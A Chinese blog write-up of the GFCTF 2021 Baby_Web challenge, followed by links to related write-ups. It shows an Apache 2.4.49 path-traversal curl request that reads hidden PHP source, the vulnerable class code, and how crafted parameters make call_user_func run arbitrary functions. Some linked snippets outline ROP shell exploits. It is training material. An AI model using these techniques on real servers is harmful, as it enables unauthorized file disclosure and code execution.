[GFCTF 2021] day2

最新推荐文章于 2024-09-09 23:53:49 发布
最新推荐文章于 2024-09-09 23:53:49 发布
阅读量976 收藏
点赞数
分类专栏: 五月一天一道题 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62046696/article/details/130546143
版权
文章描述了一种通过Apache目录穿越漏洞(DirectoryTraversal)来访问隐藏源码的方法,具体涉及curl命令和PHP代码,包括index.php和Class.php的内容。文章还提到了如何构造参数调用内部函数,如call_user_func和call_user_func_array,以执行特定操作,如显示环境变量。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Baby_Web

查看源码发现

<!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?-->

然后抓包看中间件,Apache/2.4.49 (Unix) 存在目录穿越漏洞

curl http://node4.anna.nssctf.cn:28805/cgi-bin/.%2e/.%2e/.%2e/.%2e/var/www/index        .php.txt

index.php

<?php
error_reporting(0);
define("main","main");
include "Class.php";
$temp = new Temp($_POST);
$temp->display($_GET['filename']);

?>

继续读取Class.php

<?php
defined('main') or die("no!!");
Class Temp{
    private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
    private $template;
    public function __construct($data){

        $this->date = array_merge($this->date,$data);
    }
    public function getTempName($template,$dir){
        if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);
            if(!is_file($this->template)){
                die("no!!");
            }
        }
        else{
            $this->template = './template/index.html';
        }
    }
    public function display($template,$space=''){

        extract($this->date);
        $this->getTempName($template,$space);
        include($this->template);
    }
    public function listdata($_params){
        $system = [
            'db' => '',
            'app' => '',
            'num' => '',
            'sum' => '',
            'form' => '',
            'page' => '',
            'site' => '',
            'flag' => '',
            'not_flag' => '',
            'show_flag' => '',
            'more' => '',
            'catid' => '',
            'field' => '',
            'order' => '',
            'space' => '',
            'table' => '',
            'table_site' => '',
            'total' => '',
            'join' => '',
            'on' => '',
            'action' => '',
            'return' => '',
            'sbpage' => '',
            'module' => '',
            'urlrule' => '',
            'pagesize' => '',
            'pagefile' => '',
        ];

        $param = $where = [];

        $_params = trim($_params);

        $params = explode(' ', $_params);
        if (in_array($params[0], ['list','function'])) {
            $params[0] = 'action='.$params[0];
        }
        foreach ($params as $t) {
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) { 
                $system[$var] = $val;
            } else {
                $param[$var] = $val; 
            }
        }
        // action
        switch ($system['action']) {

            case 'function':

                if (!isset($param['name'])) {
                    return  'hacker!!';
                } elseif (!function_exists($param['name'])) {
                    return 'hacker!!';
                }

                $force = $param['force'];
                if (!$force) {
                    $p = [];
                    foreach ($param as $var => $t) {
                        if (strpos($var, 'param') === 0) {
                            $n = intval(substr($var, 5));
                            $p[$n] = $t;
                        }
                    }
                    if ($p) {

                        $rt = call_user_func_array($param['name'], $p);
                    } else {
                        $rt = call_user_func($param['name']);
                    }
                    return $rt;
                }else{
                    return null;
                }
            case 'list':
                return json_encode($this->date);
        }
        return null;
    }
}

/template/admin/ 首先代码中有这一个目录,访问看一下是啥

 发现会调用listdata方法并且需要我们传参  action module

 if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);

template需要就是传进去index.html,这样才会调用listdata这个方法

$dir需要是admin,是space传进来的,所以space=admin

template也就是filename需要是 index.html

action需要是function

module也就是mod 赋值

force存在随便赋值就行

$force = $param['force'];
                if (!$force) {

利用call_user_func显示环境变量。

 

 这里action=function name=phpinfo是因为数组是以空格为分隔的。
 

 

方法二、利用call_user_func_array
 

$rt = call_user_func_array($param['name'], $p);
 

则需要满足 $p存在也就是,
 

foreach ($param as $var => $t) {
    if (strpos($var, 'param') === 0) {
        $n = intval(substr($var, 5));
        $p[$n] = $t ;
    }
 

在这里需要一个键和值,
 

结束! 
 

 
 

 

                

        

    

  



    



                



	

		

			

				
					
[自动驾驶技术]-5 Tesla自动驾驶方案之算法(AI Day 2021

				
			

			

				

					wendywm0496的博客
				

				

					05-23
					
					3487
					
				

			

		

		

			
				
有朋友问我,如何有效学习一个新技术。笔者这么多年的经验是:1)了解国内外产业应用和标准法规现状,先建立宏观知识图谱及技术系统框架;2)根据系统框架逐块进行深入研究(横向、纵向),穿插行业内主流厂商对应模块技术方案;3)系统研究行业内TOP厂商完整解决方案;4)针对你选择的重点方向进阶研究。因此笔者建立的自动驾驶专题介绍也会按照这个思路搭建技术体系(发布内容顺序不一定能严格遵守该路线,但会力求不断更新最终能按照该思路完成自动驾驶专栏搭建)。

			
		

	



                

            
              



	

		

			

				
					
NSSCTF刷题笔记pwn9——[GFCTF 2021]where_is_shell

				
			

			

				

					qq_45692883的博客
				

				

					02-02
					
					853
					
				

			

		

		

			
				
然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中。$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541。然后我们还需要一个ret的地址,否则本地能打通,远程打不通。存在一个提示函数,代码报红,说明存在问题,看一下机械码。有system函数,但是不存在/bin/sh字符串。可以看到\x24 \x30对应的是$0。main函数,存在很明显的栈溢出。找到地址 0x4005e3。

			
		

	



              


  
              

                


	

		

			

				
					
2021GFCTF

				
			

			

				

					unexpectedthing的博客
				

				

					07-07
					
					1742
					
				

			

		

		

			
				
GFCTF2021

			
		

	





	

		

			

				
					
[GFCTF2021] NSS wp

				
			

			

				

					bestkasscn的博客
				

				

					11-22
					
					3214
					
				

			

		

		

			
				
[GFCTF2021]  NSS wp
文章目录[GFCTF2021]  NSS wpwebBaby_webMISC重生之我在A国当间谍双击开始冒险REwordySIGNIN
web
Baby_web

根据源码的提示,直接用御剑扫一波后台(早上做的时候可以扫到1.php和a.php,下午复现的时候扫不到了。。)
访问a.php,ctrl + F搜索GF直接就找到了flag。。

MISC
重生之我在A国当间谍
打开是个压缩包,解压后有两个东西

很明显flag.rar的密码要去secret找,点开secr

			
		

	



		

			
		



	

		

			

				
					
GFCTF2021 部分WP

				
			

			

				

					mumuzi的博客
				

				

					11-21
					
					4750
					
				

			

		

		

			
				
只写我做了的
SignIn
GFCTF2021
回复GFCTF,得到base64解码即可
GFCTF{W3lc0me_t0_th3_12th_GFCTF}

Misc
重生之我在A国当间谍
secret是PDU编码之后的,一句一句的解就行http://www.sendsms.cn/pdu/
当然这里不是很多,如果是很多的话可以调用控制台来批量解密
倒数第二句:真让人无语。我把密码告诉你,记住,这个密码不要告诉任何人。WzFlNHJsMFwvZQ==
得到密码 [1e4rl0/e
解压出来是一张被撕毁的二维码

			
		

	





	

		

			

				
					
GFCTF2021_misc

				
			

			

				

					M3ng@L的博客
				

				

					01-19
					
					766
					
				

			

		

		

			
				
GFCTF2021_misc_复现
pikapikapika
首先是一个图像文件

根据大概英文意思,在图上按顺序拼接出一个字符串

I_want_a_p1ka!

交了两次flag,发现没对
使用010editor打开图像文件,发现里面还有个zip文件头以及其数据,提取出来
解压得到一个wav文件,听一听是杂音
使用silent eye发现没有wav文件隐藏
用audacity打开,查看频谱图有没有在频谱上的字符,但是没有
放大波形图,发现各个点呈两种情况分布

很显然正常的波形图不可能只有两种音频
把这

			
		

	





	

		

			

				
					
HECTF2021-WP集合

				
			

			

				

					Love&Share
				

				

					11-15
					
					1365
					
				

			

		

		

			
				
WP来自齐鲁师范学院网络安全社团
关注公众号接收更多最新的安全讯息
文章目录misc快来公众号yaJamesHarden捉迷藏迷途的狗狗snakeWEBEDGnb(签到)LFI_RCE时光塔的宝藏ez_pymmmmd5d5d5d5Crypto签到encodeRSA_e_nre-rsaRehardBaby_pppwn签到
misc
快来公众号ya
关注公众号回复签到
SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_}
JamesHarden
解压出来的压缩包中有一个没有后缀名的

			
		

	





	

		

			

				
					
2021.4.8 护网 0day漏洞 POC 与漏洞示例

				
			

			

				

					04-08
				

			

		

		

			
				
在IT安全领域,"2021.4.8 护网 0day漏洞 POC 与漏洞示例"这个标题揭示了一个关键的安全事件。"0day漏洞"是指那些公众和厂商都尚未知晓,因此没有补丁或修复方案的安全漏洞。这类漏洞极具危险性,因为攻击者可以利用...

			
		

	





	

		

			

				
					
software-freedom-day-2021

				
			

			

				

					03-12
				

			

		

		

			
				
2021年软件自由日 关于网络研讨会:VIT-AP的开源社区团队在2021年3月7日庆祝软件自由日。我的演讲是关于与DevOps合作以及使用CI / CD的前景。 谈话内容 标题:DevOps入门 演讲摘要:在本节中,我将分享DevOps的初学...

			
		

	





	

		

			

				
					
GameDay2021

				
			

			

				

					03-26
				

			

		

		

			
				
GameDay2021  幻想棒球的标准困境是谁该选择下一步:最佳球员,但您已经担任过该职位? 难得的位置上最好的? 下一个更近的距离,因为它们走得快? 您做出的任何选择都会产生后果,因为下一个玩家将不再具有选择权,...

			
		

	





	

		

			

				
					
Analytics-90Day-2021-12-18-080027.0003.ips.ca.synced

				
			

			

				

					12-18
				

			

		

		

			
				
Analytics-90Day-2021-12-18-080027.0003.ips.ca.synced

			
		

	





	

		

			

				
					
[GFCTF 2021]where_is_shell

				
			

			

				

					m0_73756460的博客
				

				

					03-23
					
					717
					
				

			

		

		

			
				
NSS刷题 [GFCTF 2021]where_is_shell【write up】

			
		

	





	

		

			

				
					
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))

				
			

			

				

					Mr_Fmnwon的博客
				

				

					05-31
					
					5506
					
				

			

		

		

			
				
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。

			
		

	





	

		

			

				
					
GFCTF 2021 where_is_shell

				
			

			

				

					2301_79793667的博客
				

				

					04-09
					
					390
					
				

			

		

		

			
				
要构造的payload就是首先需要覆盖返回地址,使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0)。发现定义了一个字符串buf,距栈底距离为0x10,并且有一个read函数,再检查附件其他内容并没有发现bin/sh,但是发现了一个tips,跳转到该地址进行查看。只需要取它地址后一位就可以了也就是取到0x400541就能得到$0的机器码。

			
		

	





	

		

			

				
					
[GFCTF 2021]where_is_shell——面向小白的题解

					
最新发布

				
			

			

				

					beihai1893的博客
				

				

					09-09
					
					1002
					
				

			

		

		

			
				
本题涉及到的知识点:栈溢出、栈对齐、ret2text、ROP对于刚入门的小白来说是一道拓宽视野的好题,但是如果你不知道这题涉及到的知识点盲目做的话会卡很久,比如本蒟蒻本篇Write Up默认读者具有熟练使用IDA Pro的能力以及对栈的结构有基本的认识、会做最基础的栈溢出题目,如果目前不具备以上基础,可以先学了以后再来看。

			
		

	





	

		

			

				
					
GFCTF2021-where_is_shell

				
			

			

				

					sagic的博客
				

				

					07-17
					
					340
					
				

			

		

		

			
				
总而言之我们现在要构造的payload就是首先需要覆盖返回地址,然后使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0),因为rdi是64位传参中最先传输的。利用system($0)获得shell权限。正好tips函数中有我们需要的机器码。$0在机器码中为 \x24\x30。

			
		

	





	

		

			

				
					
[GFCTF2021]文件查看器复现

				
			

			

				

					qq_42585535的博客
				

				

					05-24
					
					347
					
				

			

		

		

			
				
一键编码脚本。

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值